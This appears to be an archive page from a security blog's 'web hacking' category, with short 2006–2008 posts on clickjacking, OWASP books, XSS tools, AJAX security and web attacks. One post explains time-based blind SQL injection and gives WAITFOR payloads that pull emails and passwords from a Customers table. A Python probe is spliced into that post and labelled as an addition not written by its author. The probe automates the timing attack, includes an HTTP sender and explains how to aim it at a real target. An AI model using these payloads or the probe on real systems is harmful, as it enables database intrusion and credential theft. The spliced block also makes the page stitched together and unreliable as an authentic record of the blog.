Archive for the 'web hacking' Category...
Filed under Application Security, Fun, Internet, OWASP, Security, web hacking
This post has no technical value. Just experimenting with how much traffic I can get by putting the term “clickjacking” in a post.
But seriously, if you want to know anything about it, go listen to Martin’s podcast interview with Jeremiah and Rsnake. You can also go over to Computerworld and take a look at the Q&A.
So…
clickjacking…
clickjacking…
clickjacking…
Rsnake
Robert Hansen
Jeremiah Grossman
Whitehat Security
SecTheory LLC
OWASP
Vet
Posted by Michael Farnum on Monday, October 6th, 2008
Filed under web hacking
I was recently involved in web application assessment and discovered something that I wanted to pass along. Keep in mind that this has probably been utilized before, but it is something that I just noticed so … I wanted to throw it out for your amusement.
To set the stage, I had been looking at this application for quite some time and had an idea that SQL Injection might exist, but I was having much difficulty determining if the injection was actually present. The application was catching errors, displaying 404s, etc., and really not displaying any good data to make a decision. So the question was: if the application is catching our errors and really not giving us anything to work with, how could we ask the question to the database to indicate if we were actually getting our requests processed by the database server?
Answer? Time.
Since the application is catching all of our attempts and not providing any good feedback, the thought was: let's come up with a way to have the database provide us an "indirect" response. To do this, I tried "waitfor". In Microsoft SQL Server (T-SQL), WAITFOR specifies a time, time interval, or event that triggers the execution of a statement block, stored procedure, or transaction.
Syntax: WAITFOR { DELAY 'time' | TIME 'time' }
To implement 'waitfor', simply tag it onto the end of the injection test you're trying to accomplish. For example, if your injection string is:
30000' union select 1,email,password from Customers --
By implementing 'waitfor', your string might appear as:
30000' union select 1,email,password from Customers waitfor delay '0:0:30' --
Keep in mind that while the injection results might not appear on your screen, you will experience a delay in the response back to the browser. The point here is to demonstrate that:
- Our injection is being accepted by the database server
- The injection is executing.
So, while our injection string might not render results to the screen, we can test that the database server is executing our injection strings. Measure the normal response time first and repeat the test with a different delay value (say 5 and then 10 seconds): a delay that tracks the value you asked for is the signal, while a server that is simply slow will not change with it.
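The timing oracle described above, as an added example that is not part of David Nester's post: a Python probe that builds the WAITFOR payload, measures the response time against a baseline, and only reports injection when the slowdown tracks the requested delay. It assumes a SQL Server backend and a parameter that is concatenated into a single-quoted literal; the function names, the two fake servers (constructed stand-ins so it runs offline) and the HTTP sender are hypothetical, and the value 30000 is taken from the post.

```python
"""Time-based blind SQL injection probe.

Added example; this is not code from the original post. It assumes a
Microsoft SQL Server backend (WAITFOR DELAY is T-SQL) and an application that
concatenates the parameter into a single-quoted string literal. `send` is
supplied by the caller so the probe can be exercised offline against a fake;
the HTTP sender below is a hypothetical illustration of a real transport.
"""
import re
import time
import urllib.parse
import urllib.request
from statistics import median


def build_payload(value: str, delay_seconds: float) -> str:
    """Close the quoted literal, add a WAITFOR DELAY, and comment out the
    remainder of the original query. T-SQL accepts fractional seconds."""
    return f"{value}' waitfor delay '0:0:{delay_seconds:g}'--"


def timed(send, payload: str) -> float:
    """Seconds taken by one request carrying `payload`."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start


def probe(send, value: str, delays=(5, 10), samples: int = 3,
          tolerance: float = 0.5) -> dict:
    """Infer injection from timing alone.

    A baseline is measured with the benign value, then each requested delay is
    measured several times (median, to suppress jitter). Injection is reported
    only if every delayed request is slower than baseline by at least
    (1 - tolerance) of the requested delay AND the slowdown grows with the
    requested delay, so a server that is merely slow is not counted as a hit.
    """
    baseline = median(timed(send, value) for _ in range(samples))
    observed = {d: median(timed(send, build_payload(value, d)) for _ in range(samples))
                for d in delays}
    big_enough = all(observed[d] - baseline >= d * (1 - tolerance) for d in delays)
    grows = len(delays) < 2 or observed[delays[-1]] > observed[delays[0]]
    return {"baseline": baseline, "observed": observed,
            "confirmed": big_enough and grows}


def http_get_sender(url: str, param: str, timeout: float = 60.0):
    """Hypothetical real transport: GET `url` with the payload in `param`.
    Use only against applications you are authorized to test."""
    def send(payload: str) -> None:
        query = urllib.parse.urlencode({param: payload})
        with urllib.request.urlopen(f"{url}?{query}", timeout=timeout) as resp:
            resp.read()
    return send


def fake_vulnerable_server(payload: str) -> None:
    """Constructed stand-in for an injectable page: it 'executes' the WAITFOR
    by sleeping for the requested delay on top of a small fixed cost."""
    time.sleep(0.01)
    m = re.search(r"waitfor delay '0:0:([0-9.]+)'", payload)
    if m:
        time.sleep(float(m.group(1)))


def fake_slow_server(payload: str) -> None:
    """Constructed stand-in for a slow but non-injectable page."""
    time.sleep(0.1)


if __name__ == "__main__":
    # Short delays keep the demo quick; against a real target use whole seconds.
    print(probe(fake_vulnerable_server, "30000", delays=(0.2, 0.4)))
    print(probe(fake_slow_server, "30000", delays=(0.2, 0.4)))
```

Against a real target, swap the fake for `http_get_sender(url, "id")` and keep the delays well above the server's normal variance; the second, larger delay is what separates a genuine WAITFOR from a slow application.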
Posted by David Nester on Tuesday, February 5th, 2008
Filed under web hacking
An interesting download to come out of the OWASP camp — books are now available for your reading pleasure. The initial group of books is:
- OWASP CLASP v1.2
- OWASP Top 10 - 2007 Edition
- OWASP Top 10 - Testing - Legal 07
- OWASP WebGoat and WebScarab
- OWASP Code Review - 2007 (RC1)
- OWASP Evaluation and Certification Criteria
- OWASP Top 10 - Ruby on Rails Version
- OWASP SpoC 2007
- OWASP World (Nov2007)
- OWASP Guide 2.0 (2005)
All are available free of charge (download versions) from LuLu.com/owasp.
Posted by David Nester on Wednesday, January 30th, 2008
Filed under web hacking
So you don't consider yourself to be XSS savvy, but you would really like to do some free testing? Well, look no further; you just might have a solution. Introducing the XSSDB by GNUCitizen. The XSSDB (I'm assuming) is heading in the same direction as the Metasploit Project, however, solely based on Cross-Site Scripting checks.
A couple of the nice[r] features (IMHO) of the database:
- Ability to perform both GET and POST-based XSS
- Ability to add or submit your own vulnerability checks to the DB
So how could this be improved? Personally, while I do have several methods of testing for XSS, I would find it invaluable to have an offline solution where I could test non-internet-connected applications. GNU? Perhaps some type of offline solution with an update capability? The solution does take a bit of getting used to (for example, if you aren't terribly familiar with how GET, POST and parameters work in web applications), but overall, a very nice solution.
Posted by David Nester on Wednesday, January 30th, 2008
Filed under web hacking
Billy Hoffman and Bryan Sullivan released a new book on AJAX Security this last month (or so). For those of you who aren’t familiar with Billy and Bryan, they are/were involved in the SPI Dynamics group before being acquired by HP Software in late 2007. I would highly recommend that you grab a copy of this book for your library.
AJAX Security Book
[Ripped from Amazon]
Billy Hoffman is the lead researcher for HP Security Labs of HP Software. At HP, Billy focuses on JavaScript source code analysis, automated discovery of Web application vulnerabilities, and Web crawling technologies. He has worked in the security space since 2001 after he wrote an article on cracking software for 2600, “The Hacker Quarterly,” and learned that people would pay him to be curious. Over the years Billy has worked a variety of projects including reverse engineering file formats, micro-controllers, JavaScript malware, and magstripes. He is the creator of Stripe Snoop, a suite of research tools that captures, modifies, validates, generates, analyzes, and shares data from magstripes.
Bryan Sullivan is a software development manager for the Application Security Center division of HP Software. He has been a professional software developer and development manager for over 12 years, with the last five years focused on the Internet security software industry. Prior to HP, Bryan was a security researcher for SPI Dynamics, a leading Web application security company acquired by HP in August 2007. While at SPI, he created the DevInspect product, which analyzes Web applications for security vulnerabilities during development. Bryan is a frequent speaker at industry events, most recently AjaxWorld, Black Hat, and RSA. He was involved in the creation of the Application Vulnerability Description Language (AVDL) and has three patents on security assessment and remediation methodologies pending review.
Posted by David Nester on Wednesday, January 30th, 2008
Filed under web hacking
It’s simply amazing to me that folks will fall for the marketing literature. Hacker Safe? I think not….
http://www.cioinsight.com/article2/0,1540,2246925,00.asp
Posted by David Nester on Wednesday, January 30th, 2008
Filed under Security, web hacking
It was just reported by SANS. Be careful if you go there.
Vet
Posted by Michael Farnum on Monday, August 14th, 2006
Filed under Crime, Security, Sheesh, web hacking
Martin McKeay posted a few days back about keylogging software on clients of HSBC Bank. Bruce Schneier pointed out this article this morning about the same issue. Both came to roughly the same conclusion: this is ridiculous.
Yes, there are things the bank can do to help with this, but come on, where is the personal responsibility for the clients? Sheesh.
Vet
Posted by Michael Farnum on Monday, August 14th, 2006
Filed under DDos, Security, Sheesh, web hacking
Politics can be fun, and it can be real ugly, and often both at the same time. And in this digital age, everyone has a chance to get involved, including script kiddies that have a political axe to grind. Go read the story here. But what got me about this whole deal was this quote from Dan Geary, who runs Lieberman’s site:
“This is a direct disruption of a federal campaign,” he said. “I have to see us go to an era where security is primary instead of the primary focus being new and innovative ways to get the message out.”
Uhhh, that deserves a big "duh". Dude, you run the website. I am sure you are an activist and want to get Senator Lieberman re-elected, but running the website and securing the website is your job. Frankly, that quote sounds more like something a politician would say rather than a web admin. If you don't know that you are going to be dealing with this kind of stuff, then the good senator hired the wrong guy. Sheesh.
Vet
Posted by Michael Farnum on Tuesday, August 8th, 2006